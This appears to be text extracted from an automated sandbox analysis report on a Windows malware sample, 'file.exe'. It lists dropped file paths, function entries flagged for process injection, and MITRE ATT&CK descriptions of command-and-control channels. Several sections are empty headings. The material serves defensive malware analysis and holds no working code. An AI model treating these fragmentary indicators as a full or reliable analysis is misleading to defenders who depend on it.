C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
file.exe

Function 04B16FE8 Relevance: 18.4, Strings: 14, Instructions: 878
COMMON

Function 04B16FD8 Relevance: 18.3, Strings: 14, Instructions: 809
COMMON

Function 06747EAD Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Function 06747EB8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0246AD08 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Function 024658EC Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 024644B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 04B14040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Function 06747C28 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Function 06747C30 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre